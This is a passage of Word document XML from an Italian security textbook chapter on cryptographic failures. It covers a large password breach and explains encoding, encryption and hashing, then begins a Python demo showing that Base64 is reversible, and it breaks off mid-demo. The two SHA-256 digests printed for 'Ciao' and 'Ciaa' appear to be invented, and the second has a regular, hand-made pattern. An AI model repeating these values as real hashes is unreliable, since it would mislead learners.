      <w:r>
        <w:t xml:space="preserve">— un metodo già considerato debole all’epoca. Nelle 24 ore successive, gruppi di attaccanti hanno decifrato la maggior parte delle password con strumenti standard. Quattro anni dopo, nel 2016, un secondo dump dello stesso breach ha rivelato che il numero reale era di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">167 milioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le password recuperate hanno alimentato per anni attacchi di credential stuffing su altri siti — perché molti utenti riusano la stessa password ovunque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nello stesso anno, una società di sicurezza ha cracckato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6,5 milioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di quelle password in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6 giorni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usando un singolo computer. La causa non era la potenza dell’attaccante: era la scelta sbagliata dell’algoritmo di hashing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo capitolo spiega perché succedono cose del genere e come evitarle. Tratta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A04 — Cryptographic Failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ed è la sintesi tra teoria minima necessaria e pratica operativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="308" w:name="X4e68091b07d659c964586ee50d696c61a6a26fc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="sec_7_1"/>
      <w:r>
        <w:t xml:space="preserve">7.1 Tre operazioni che sembrano simili ma non lo sono</w:t>
      </w:r>
      <w:bookmarkEnd w:id="526"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encoding, cifratura, hashing. Tre verbi che molti programmatori usano in modo intercambiabile. Non sono intercambiabili. Confonderli causa la maggior parte dei disastri di questo capitolo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="304" w:name="encoding-codifica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encoding (codifica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una trasformazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">reversibile, senza chiave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, di dati in un formato diverso. Si usa per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rappresentare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati in un formato più conveniente per il trasporto o lo storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Morse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ogni lettera diventa una sequenza di punti e linee. Chiunque conosca le regole può decodificare il messaggio. Non c’è segreto: il Morse è pubblico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trasforma dati binari in caratteri ASCII stampabili. Si usa per trasmettere immagini in email, allegati in JSON, e così via. La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2lhbw==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Chiunque, in 2 secondi, può fare l’inverso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Errore comune.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vedrai spesso programmatori che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">proteggono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati sensibili codificandoli in Base64. Non li hanno protetti: li hanno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">trasformati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e la trasformazione è banalmente reversibile da chiunque. Base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cifratura.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="304"/>
    <w:bookmarkStart w:id="305" w:name="cifratura-encryption"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cifratura (encryption)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una trasformazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">reversibile, CON chiave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, di dati. Senza la chiave giusta, decifrare è praticamente impossibile (per gli algoritmi moderni: tempo dell’universo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cassaforte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chi ha la chiave o la combinazione può aprirla; chi non ce l’ha, no.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AES-256-GCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è l’algoritmo di cifratura simmetrica standard moderno. La stessa chiave serve per cifrare e decifrare. La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cifrata con una chiave diventa una sequenza casuale di byte; con la chiave giusta torna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, senza chiave è impenetrabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La cifratura ha senso quando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">devi recuperare i dati originali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: numeri di carta di credito da addebitare, documenti da mostrare al proprietario, messaggi da consegnare al destinatario.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="305"/>
    <w:bookmarkStart w:id="306" w:name="hashing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hashing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una trasformazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NON reversibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">senza chiave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, di dati. Una funzione di hash prende un input di qualsiasi lunghezza e produce un output di lunghezza fissa (l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">impronta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">digest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Dato l’output, non esiste alcun modo di ricostruire l’input se non provando tutte le combinazioni possibili (forza bruta).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tritacarne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Inserisci una bistecca, ottieni carne tritata. Dalla carne tritata non puoi ricostruire la bistecca.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una funzione di hash crittografica. La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">produce sempre lo stesso digest:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">e0c9035898dd52fc65c41454cec9c4d2611bfb37e2e7c8b32a9b1c8c5b7a9e8a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cambiando un solo carattere —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciaa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— il digest cambia completamente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8a35c7d4f1f4e63f8a45e0b7f3a7e2d5b9c8a1e4f7c6d9b2a5e8c1f4d7b0e3a9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le proprietà chiave di una buona funzione di hash:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Deterministica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: stesso input → stesso output, sempre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Veloce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da calcolare (ma vedremo che per le password questa è una vulnerabilità!).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Collision resistance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è praticamente impossibile trovare due input diversi che producono lo stesso output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Avalanche effect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: cambiare un solo bit dell’input cambia drasticamente l’output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-image resistance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dato l’output, è praticamente impossibile risalire all’input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’hashing si usa quando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non devi recuperare i dati originali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma solo verificare se due dati corrispondono. Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono il caso d’uso classico.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="306"/>
    <w:bookmarkStart w:id="307" w:name="riassunto-della-distinzione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riassunto della distinzione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Operazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reversibile?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chiave?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uso tipico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sì, banalmente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trasporto/rappresentazione (Base64, URL encoding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cifratura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sì, con chiave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proteggere dati che dovrai recuperare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Verifica di identità senza memorizzare il dato originale (password, integrità file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="307"/>
    <w:bookmarkEnd w:id="308"/>
    <w:bookmarkStart w:id="309" w:name="X7a2f86e4231281cc27d559a314a678bddf73c58"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="sec_7_2"/>
      <w:r>
        <w:t xml:space="preserve">7.2 Perché Base64 non è cifratura: dimostrazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri un terminale Python (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel terminale di VS Code, con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attivo) e prova:</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base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> base64.b64encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"password-segretissima-2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'cGFzc3dvcmQtc2VncmV0aXNzaW1hLTIwMjU='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso facciamo l’inverso,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">senza chiave, senza autenticazione, senza nulla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> base64.b64decode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cGFzc3dvcmQtc2VncmV0aXNzaW1hLTIwMjU="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
